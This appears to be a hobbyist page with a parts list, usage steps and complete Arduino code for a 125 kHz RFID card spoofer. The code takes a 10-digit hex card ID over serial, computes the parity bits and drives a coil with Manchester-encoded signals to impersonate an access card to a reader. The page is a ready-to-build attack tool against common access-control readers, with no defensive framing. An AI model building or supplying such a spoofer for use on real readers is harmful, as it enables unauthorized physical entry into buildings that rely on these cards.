125 kHz RFID spoofing
Circuit schematics
List of materials:
- an antenna (there are many 125 kHz antennas on eBay)
- 1 nF capacitor (this value may need to be tuned for the best resonance with the antenna)
- 4 × 1N4148 diodes
- 100 kΩ resistor
- 5.1 V Zener diode
Usage
Connect the two terminals of the circuit to GND and pin 12.
Compile and upload the code below.
Open a serial terminal (9600 bit/s), e.g.
screen /dev/ttyUSB0 9600
Type in 10 hexadecimal digits (characters are not echoed). The code computes all the parity bits, both horizontal (per row) and vertical (per column).
Code
#define coil_pin 12 char data[10]; int data_count =0; int spoofed_card[64] = {1,1,1,1,1,1,1,1,1}; //header void setup() { pinMode(coil_pin, OUTPUT); digitalWrite(coil_pin, LOW); Serial.begin(9600); } void loop() { if(Serial.available()){ char key = Serial.read(); if(key != '\0') { data[data_count] = key; if(data_count == 9){ spoofcard(); data_count = 0; } else data_count ++; } } } void compute_data(){ // Compute raw data int data_iterator; int bit; int bit_set; for(bit = 0, data_iterator = 0; bit < 59; bit += 5, data_iterator++){ int raw_data = HexToDec(data[data_iterator]); spoofed_card[bit+9] = !! (raw_data & 8); spoofed_card[bit+10] = !! (raw_data & 4); spoofed_card[bit+11] = !! (raw_data & 2); spoofed_card[bit+12] = !! (raw_data & 1); } int i = 8; // CRC ROW for(int c = 3; c < 13; c++){ bit_set = 0; for(i++; i < ((c * 5) - 2); i++) if(spoofed_card[i]) bit_set++; spoofed_card[(c * 5)-2] = ((bit_set % 2) != 0); } // CRC COL for(int c = 0; c < 4; c++){ bit_set = 0; for(int a = 9; a < 55; a += 5){ if(spoofed_card[a + c]) bit_set++; } spoofed_card[c + 59] = ((bit_set % 2) != 0); } } void spoofcard(){ compute_data(); for(int h = 0; h < 50; h++) spoofnow(); } void send_manchester(int clock_half, int signal) { int man_encoded = clock_half ^ signal; if(man_encoded == 1) digitalWrite(coil_pin, LOW); else digitalWrite(coil_pin, HIGH); } void spoofnow(){ for(int i = 0; i < 64; i++) { send_manchester(0, spoofed_card[i]); delayMicroseconds(256); send_manchester(1, spoofed_card[i]); delayMicroseconds(256); } } int HexToDec(char hexa) { if (hexa >= '0' && hexa <= '9') return hexa - '0'; else if (hexa >= 'A' && hexa <= 'F') return hexa - 'A' + 10; else if (hexa >= 'a' && hexa <= 'f') return hexa - 'a' + 10; else return 0; }